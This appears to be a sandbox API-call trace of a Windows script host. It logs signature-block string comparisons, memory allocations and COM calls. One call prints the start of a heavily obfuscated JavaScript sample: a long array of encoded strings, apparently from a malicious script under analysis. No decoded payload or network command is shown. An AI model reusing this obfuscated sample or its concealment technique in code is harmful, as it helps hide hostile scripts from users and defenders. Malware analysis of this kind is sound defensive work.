	[0068.037] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0068.037] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0068.037] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0068.037] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0068.037] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0068.037] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0068.037] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.037] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0068.037] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.037] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.038] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0068.038] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0068.038] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.038] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0068.038] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.038] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0068.038] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0068.038] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.038] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0068.038] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0068.038] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.038] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0068.038] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0068.038] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0068.038] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0068.038] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0068.038] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0068.038] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0068.038] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0068.038] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.038] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0068.038] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.038] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.038] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0068.038] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0068.038] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.038] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0068.038] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0068.038] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0068.038] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0068.038] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0068.038] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0068.038] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.038] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.038] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0068.038] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0068.039] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0068.039] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0068.039] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0068.039] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0068.039] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.039] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0068.039] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.039] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0068.039] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0068.039] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.039] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0068.039] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0068.039] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0068.039] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0068.039] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0068.039] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.039] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.039] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0068.039] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0068.039] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0068.039] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0068.039] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.040] SetLastError (dwErrCode=0xb) 
	[0068.041] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0068.041] CloseCodeAuthzLevel () returned 0x1
	[0068.041] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0068.041] ??2@YAPEAX_K@Z () returned 0x2bf3f0
	[0068.041] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0068.041] GetProcessHeap () returned 0x3b0000
	[0068.041] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3e8430, Size=0x11238) returned 0x41af30
	[0068.042] ??2@YAPEAX_K@Z () returned 0x2bf480
	[0068.042] GetCurrentThreadId () returned 0x478
	[0068.042] realloc (_Block=0x0, _Size=0xc8) returned 0x2bf4e0
	[0068.042] ??2@YAPEAX_K@Z () returned 0x2bf5b0
	[0068.042] malloc (_Size=0x1008) returned 0x2ba4f0
	[0068.042] ??2@YAPEAX_K@Z () returned 0x2bf5f0
	[0068.043] malloc (_Size=0x108) returned 0x2b7d80
	[0068.043] malloc (_Size=0x208) returned 0x2bf7a0
	[0068.043] malloc (_Size=0x200) returned 0x2bf9b0
	[0068.043] malloc (_Size=0x408) returned 0x2bfbc0
	[0068.044] malloc (_Size=0x2008) returned 0x2bb500
	[0068.044] malloc (_Size=0x808) returned 0x2bd510
	[0068.044] malloc (_Size=0x1008) returned 0x2bdd20
	[0068.046] malloc (_Size=0x4008) returned 0x4bdfd0
	[0068.046] malloc (_Size=0x2008) returned 0x4c1fe0
	[0068.049] malloc (_Size=0x4008) returned 0x4c3ff0
	[0068.050] malloc (_Size=0x108) returned 0x2b7e90
	[0068.050] realloc (_Block=0x0, _Size=0x64) returned 0x2bed30
	[0068.050] realloc (_Block=0x0, _Size=0x64) returned 0x2beda0
	[0068.051] realloc (_Block=0x2beda0, _Size=0x38) returned 0x2beda0
	[0068.053] realloc (_Block=0x2bf5f0, _Size=0x60) returned 0x2bf5f0
	[0068.053] realloc (_Block=0x2bf5f0, _Size=0x90) returned 0x2bf5f0
	[0068.053] realloc (_Block=0x2bf5f0, _Size=0xd8) returned 0x2bf5f0
	[0068.053] realloc (_Block=0x2bf5f0, _Size=0x140) returned 0x2bf5f0
	[0068.053] realloc (_Block=0x2bf5f0, _Size=0x1e0) returned 0x2bf9b0
	[0068.054] realloc (_Block=0x2bf9b0, _Size=0x2d0) returned 0x2bed30
	[0068.054] realloc (_Block=0x2bed30, _Size=0x438) returned 0x4e8080
	[0068.054] realloc (_Block=0x4e8080, _Size=0x650) returned 0x4e8080
	[0068.054] realloc (_Block=0x4e8080, _Size=0x978) returned 0x4e8080
	[0068.054] malloc (_Size=0x4008) returned 0x4e8a10
	[0068.055] realloc (_Block=0x4e8080, _Size=0xe30) returned 0x4eca20
	[0068.055] malloc (_Size=0x12620) returned 0x4ed860
	[0068.056] ??2@YAPEAX_K@Z () returned 0x2bf0b0
	[0068.057] free (_Block=0x4dc050) 
	[0068.057] free (_Block=0x4c8000) 
	[0068.057] free (_Block=0x4bdfd0) 
	[0068.057] free (_Block=0x2bb500) 
	[0068.057] free (_Block=0x2ba4f0) 
	[0068.057] ??3@YAXPEAX@Z () returned 0x64fac301
	[0068.057] free (_Block=0x4eca20) 
	[0068.057] free (_Block=0x4e8a10) 
	[0068.057] free (_Block=0x4e4070) 
	[0068.058] free (_Block=0x4e0060) 
	[0068.058] free (_Block=0x4d8040) 
	[0068.058] free (_Block=0x4d4030) 
	[0068.058] free (_Block=0x4d0020) 
	[0068.058] free (_Block=0x4cc010) 
	[0068.058] free (_Block=0x4c3ff0) 
	[0068.058] free (_Block=0x4c1fe0) 
	[0068.058] free (_Block=0x2bdd20) 
	[0068.058] free (_Block=0x2bd510) 
	[0068.059] free (_Block=0x2bfbc0) 
	[0068.059] free (_Block=0x2bf7a0) 
	[0068.059] free (_Block=0x2b7d80) 
	[0068.059] ??2@YAPEAX_K@Z () returned 0x2bf5b0
	[0068.059] ??2@YAPEAX_K@Z () returned 0x2bf610
	[0068.059] malloc (_Size=0x10) returned 0x2bf640
	[0068.060] free (_Block=0x2bf4e0) 
	[0068.060] ??2@YAPEAX_K@Z () returned 0x2bf4e0
	[0068.060] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22ee98 | out: ppv=0x22ee98*=0x3cf420) returned 0x0
	[0068.251] ??2@YAPEAX_K@Z () returned 0x2bf560
	[0068.252] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefec0a1b0, pUnk=0x2bf560, riid=0x7fee1476340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x2bf598 | out: pdwCookie=0x2bf598*=0x100) returned 0x0
	[0068.252] IUnknown:AddRef (This=0x3cf420) returned 0x2
	[0068.252] IUnknown:Release (This=0x3cf420) returned 0x1
	[0068.252] ??2@YAPEAX_K@Z () returned 0x4ffe90
	[0068.252] ??2@YAPEAX_K@Z () returned 0x2bf940
	[0068.252] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22eee8 | out: ppv=0x22eee8*=0x3cf420) returned 0x0
	[0068.252] IUnknown:Release (This=0x3cf420) returned 0x1
	[0068.253] ??2@YAPEAX_K@Z () returned 0x2bfa00
	[0068.253] ISystemDebugEventFire:IsActive (This=0x3e75b0) returned 0x1
	[0068.253] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22ee88 | out: ppv=0x22ee88*=0x3cf420) returned 0x0
	[0068.253] IUnknown:Release (This=0x3cf420) returned 0x1
	[0068.254] malloc (_Size=0x2e48) returned 0x2ba4f0
	[0068.254] GetCurrentThreadId () returned 0x478
	[0068.254] ??2@YAPEAX_K@Z () returned 0x2bfae0
	[0068.255] ??2@YAPEAX_K@Z () returned 0x2bfbc0
	[0068.255] malloc (_Size=0x208) returned 0x2bfca0
	[0068.256] ??2@YAPEAX_K@Z () returned 0x2bd750
	[0068.256] ??2@YAPEAX_K@Z () returned 0x2be0d0
	[0068.257] ??2@YAPEAX_K@Z () returned 0x2bfeb0
	[0068.257] ??2@YAPEAX_K@Z () returned 0x2bff30
	[0068.257] ??2@YAPEAX_K@Z () returned 0x2bea50
	[0068.257] malloc (_Size=0x20) returned 0x2bed40
	[0068.257] malloc (_Size=0x288) returned 0x2bed70
	[0068.257] realloc (_Block=0x0, _Size=0x140) returned 0x500810
	[0068.258] realloc (_Block=0x2bed40, _Size=0x40) returned 0x2bf000
	[0068.258] realloc (_Block=0x500810, _Size=0x280) returned 0x500810
	[0068.258] malloc (_Size=0x508) returned 0x500aa0
	[0068.258] realloc (_Block=0x2bf000, _Size=0x80) returned 0x500fb0
	[0068.258] realloc (_Block=0x500810, _Size=0x500) returned 0x501040
	[0068.258] malloc (_Size=0xa08) returned 0x501550
	[0068.258] realloc (_Block=0x500fb0, _Size=0x100) returned 0x500810
	[0068.258] realloc (_Block=0x501040, _Size=0xa00) returned 0x501f60
	[0068.258] malloc (_Size=0x1408) returned 0x4bdfd0
	[0068.259] realloc (_Block=0x500810, _Size=0x200) returned 0x500810
	[0068.259] realloc (_Block=0x501f60, _Size=0x1400) returned 0x4bf3e0
	[0068.259] ??2@YAPEAX_K@Z () returned 0x500fb0
	[0068.260] ??2@YAPEAX_K@Z () returned 0x500a20
	[0068.260] ??2@YAPEAX_K@Z () returned 0x501090
	[0068.260] malloc (_Size=0x80) returned 0x501140
	[0068.260] malloc (_Size=0x108) returned 0x2b7d80
	[0068.261] ??2@YAPEAX_K@Z () returned 0x5011d0
	[0068.261] malloc (_Size=0x18) returned 0x2bffb0
	[0068.262] ??2@YAPEAX_K@Z () returned 0x5012b0
	[0068.262] ??2@YAPEAX_K@Z () returned 0x501f60
	[0068.262] malloc (_Size=0x80) returned 0x501360
	[0068.262] malloc (_Size=0x108) returned 0x2b7e90
	[0068.263] ??2@YAPEAX_K@Z () returned 0x501480
	[0068.270] ??2@YAPEAX_K@Z () returned 0x502250
	[0068.271] ??2@YAPEAX_K@Z () returned 0x502330
	[0068.271] ??2@YAPEAX_K@Z () returned 0x5023b0
	[0068.271] malloc (_Size=0x80) returned 0x502460
	[0068.271] malloc (_Size=0x108) returned 0x2b80b0
	[0068.272] ??2@YAPEAX_K@Z () returned 0x502700
	[0068.272] malloc (_Size=0x18) returned 0x501530
	[0068.272] ??2@YAPEAX_K@Z () returned 0x5027e0
	[0068.272] ??2@YAPEAX_K@Z () returned 0x502860
	[0068.272] malloc (_Size=0x80) returned 0x502910
	[0068.272] malloc (_Size=0x108) returned 0x2b81c0
